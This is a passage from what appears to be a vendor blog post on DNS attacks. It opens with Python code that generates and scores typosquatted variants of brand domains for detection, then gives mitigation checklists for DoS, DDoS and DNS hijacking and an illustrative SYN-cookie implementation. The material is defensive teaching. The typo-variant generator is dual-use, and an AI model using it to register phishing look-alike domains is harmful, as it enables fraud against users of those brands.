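KEYBOARD_NEIGHBORS = {
    "a": "qwsz", "b": "vghn", "c": "xdfv", "d": "serfcx", "e": "wsdr", "f": "drtgvc",
    "g": "ftyhbv", "h": "gyujnb", "i": "ujko", "j": "huikmn", "k": "jiolm", "l": "kop",
    "m": "njk", "n": "bhjm", "o": "iklp", "p": "ol", "q": "wa", "r": "edft", "s": "awedxz",
    "t": "rfgy", "u": "yhji", "v": "cfgb", "w": "qase", "x": "zsdc", "y": "tghu", "z": "asx",
}

BRANDS = {"paypal", "appleid"}      # constructed watch-list of protected labels


def typo_variants(label: str) -> set:
    """Single-edit typos: dropped letter, doubled letter, swapped neighbours, fat finger."""
    variants = set()
    for i, ch in enumerate(label):
        variants.add(label[:i] + label[i + 1:])                         # omission: payal
        variants.add(label[:i] + ch + label[i:])                        # repetition: paypall
        if i + 1 < len(label):
            variants.add(label[:i] + label[i + 1] + ch + label[i + 2:])  # transposition: pyapal
        for key in KEYBOARD_NEIGHBORS.get(ch, ""):
            variants.add(label[:i] + key + label[i + 1:])               # adjacent key: paupal
    variants.discard(label)
    return variants


def levenshtein(a: str, b: str) -> int:
    previous = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        current = [i]
        for j, cb in enumerate(b, 1):
            current.append(min(previous[j] + 1, current[j - 1] + 1, previous[j - 1] + (ca != cb)))
        previous = current
    return previous[-1]


def registered_label(domain: str) -> str:
    """Second-level label of the domain (crude: ignores co.uk-style public suffixes)."""
    labels = domain.lower().rstrip(".").split(".")
    return labels[-2] if len(labels) >= 2 else labels[0]


def typosquat_match(domain: str, brands=BRANDS, max_distance: int = 2):
    """Return (brand, distance) for the closest protected brand within max_distance,
    or None when the domain is the brand itself or not close to any brand."""
    label = registered_label(domain)
    best = None
    for brand in brands:
        if label == brand:
            return None
        d = levenshtein(label, brand)
        if d <= max_distance and (best is None or d < best[1]):
            best = (brand, d)
    return best
```

The variant generator is what you feed into certificate-transparency and new-registration monitoring; the distance scorer is what you put in front of the mail gateway. Neither catches homograph attacks that swap in look-alike Unicode characters, which need a separate confusables check on the decoded IDN.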
How to Mitigate DNS Attacks
All of these attacks can severely disrupt operations, not to mention that some DDoS and ransomware operators destroy the data, the device, or both once the attack is done. So, let’s see about mitigation.
DoS Attack Mitigation
- Host behind a provider or CDN with enough capacity to absorb floods, rather than on a single link you have to defend alone.
- Implement availability monitoring, so an outage is noticed in minutes rather than hours.
- Don’t forget about registrar locking.
- Invest in an IDS/IPS.
- Run automated static and dynamic analysis on your own code.
- When in doubt, fuzz the input-handling code.
- Enable data execution prevention (NX/DEP).
- Ensure that coding is secure: bounds-checked string and memory APIs, hard limits on input sizes, and no user-controlled regular expressions.
- Act on compiler warnings instead of silencing them.
- Build with stack canaries (for example, GCC and Clang’s -fstack-protector).
- Rate-limit inbound ICMP messages.
- Fine-tune the perimeter firewall.
- Recycle the oldest half-open TCP connection once the SYN backlog is full.
- Don’t forget about SYN cookies.
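SYN cookies, the last item above, are the cure for the half-open attack described in the SYN flood section: the server encodes everything it needs into the initial sequence number of its SYN-ACK and keeps no state until the handshake completes. Here is an added example (not code from the original article, and simplified from the Linux implementation) of that encoding and its validation; the secret key, the MSS table, the counter period and the 4-tuples are constructed.

```python
import hashlib
import hmac
import ipaddress
import struct
import time

# Added example, not code from the original article. A simplified SYN cookie in
# the spirit of RFC 4987 and the Linux implementation: the server's initial
# sequence number carries a 5-bit time counter, a 3-bit MSS index and a 24-bit
# keyed hash of the connection 4-tuple, so no backlog entry is kept between SYN
# and ACK. Secret, table, period and addresses are constructed for the demo.

SECRET = b"rotate-me-per-boot"          # assumption: per-boot secret key
MSS_TABLE = [536, 1220, 1440, 1460]      # 3-bit index field; four entries used here
COUNTER_PERIOD = 64                       # seconds per counter tick
MAX_AGE_TICKS = 4                         # reject cookies older than ~4 minutes


def _counter(now: float) -> int:
    return int(now // COUNTER_PERIOD) & 0x1F                    # 5 bits


def _mac(src_ip: bytes, src_port: int, dst_ip: bytes, dst_port: int, counter: int, client_isn: int) -> int:
    msg = struct.pack("!4s4sHHIB", src_ip, dst_ip, src_port, dst_port, client_isn, counter)
    return int.from_bytes(hmac.new(SECRET, msg, hashlib.sha256).digest()[:3], "big")   # 24 bits


def make_cookie(src_ip, src_port, dst_ip, dst_port, client_isn, mss, now=None) -> int:
    """Server ISN for the SYN-ACK: [counter:5][mss_idx:3][mac:24]."""
    counter = _counter(time.time() if now is None else now)
    mss_idx = 0
    for i, m in enumerate(MSS_TABLE):        # largest table entry not above the client's MSS
        if m <= mss:
            mss_idx = i
    mac = _mac(src_ip, src_port, dst_ip, dst_port, counter, client_isn)
    return (counter << 27) | (mss_idx << 24) | mac


def check_cookie(src_ip, src_port, dst_ip, dst_port, client_isn, ack, now=None):
    """Validate the final ACK of the handshake (client_isn is the client's seq - 1).
    Returns the negotiated MSS, or None if the cookie is forged or stale."""
    cookie = (ack - 1) & 0xFFFFFFFF
    counter = cookie >> 27
    mss_idx = (cookie >> 24) & 0x7
    mac = cookie & 0xFFFFFF
    current = _counter(time.time() if now is None else now)
    if ((current - counter) & 0x1F) > MAX_AGE_TICKS:            # too old, or counter wrapped
        return None
    expected = _mac(src_ip, src_port, dst_ip, dst_port, counter, client_isn)
    if not hmac.compare_digest(mac.to_bytes(3, "big"), expected.to_bytes(3, "big")):
        return None
    if mss_idx >= len(MSS_TABLE):
        return None
    return MSS_TABLE[mss_idx]


def demo():
    src = ipaddress.ip_address("198.51.100.7").packed       # constructed client
    dst = ipaddress.ip_address("203.0.113.10").packed       # constructed server
    t0 = 1_700_000_000.0
    # Legitimate client: SYN at t0, ACK two seconds later with ack = server_isn + 1.
    isn = make_cookie(src, 40000, dst, 443, client_isn=0xDEADBEEF, mss=1460, now=t0)
    ok = check_cookie(src, 40000, dst, 443, 0xDEADBEEF, isn + 1, now=t0 + 2)
    # Flooder who never saw the SYN-ACK guesses an ACK number.
    forged = check_cookie(src, 40000, dst, 443, 0xDEADBEEF, 0x12345678, now=t0 + 2)
    # A valid cookie off by one fails the hash.
    tampered = check_cookie(src, 40000, dst, 443, 0xDEADBEEF, isn + 2, now=t0 + 2)
    # Replay of a valid cookie ten minutes later fails the age check.
    stale = check_cookie(src, 40000, dst, 443, 0xDEADBEEF, isn + 1, now=t0 + 10 * COUNTER_PERIOD)
    return ok, forged, tampered, stale
```

The price of statelessness is visible in the code: only a few TCP options survive (here just a coarse MSS), which is why kernels enable cookies only once the backlog overflows rather than for every connection.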
DDoS Attack Mitigation
- Perform deep-packet inspection.
- Put traffic-scrubbing filters into effect, ideally upstream of your own links.
- Keep the “worst is yet to come” rule in mind. Most DDoS attacks come in waves: the first wave is the attacker testing your defenses, so expect a second and even a third.
- Rate-limit the system’s responses to ICMP packets.
- Perform regular traffic profiling, so that you know what “normal” looks like before the flood arrives.
- Keep IP reputation in mind.
- Verify source addresses at your network edge (BCP 38 ingress and egress filtering), so your own network cannot be used to send spoofed packets.
- Disable monlist on NTP servers, or upgrade to an ntpd release that no longer implements it.
- Implement access control lists at the edge.
- Apply cyber-awareness practices such as not clicking on suspicious links and not opening emails from untrusted or unknown sources, so your endpoints do not end up as someone else’s bots.
- Use a web application firewall.
DNS Hijacking Attack Mitigation
- Shut down unneeded DNS resolvers.
- Place legitimate DNS resolvers behind a firewall and ensure they cannot be queried from outside your organization; an open resolver is a reflector for everyone else’s amplification attacks.
- Separate your authoritative name server from the DNS resolver.
- Apply patches for known vulnerabilities as soon as their developers release them.
- Enable registrar lock on your domains (the clientTransferProhibited and clientUpdateProhibited statuses), and protect the registrar account with multi-factor authentication.
- Ensure that your organization is using a DNS registrar with DNSSEC support.
- Always enable DNSSEC: sign your zones and turn on validation on your resolvers.
- Use an encrypted VPN connection for your enterprise, so that a poisoned resolver on a hotel or café network does not decide where your traffic goes.
- Implement a router password hygiene policy: many hijacks begin by rewriting the DNS server settings of a home or office router that still has its default credentials.
One more thing before I go: coverage. The methods illustrated in the previous section protect you only to a certain extent. Beyond that point, protection mostly falls into the trial-and-error zone.
For that extra ounce of protection, you should give Heimdal™ Threat Prevention Endpoint a try: DNS traffic filtering, deep-packet inspection, and everything you can think of in terms of DNS attack prevention at your fingertips. Hope you’ve enjoyed this little read and, as always, stay safe, stay frosty, and reach out if you have any more questions.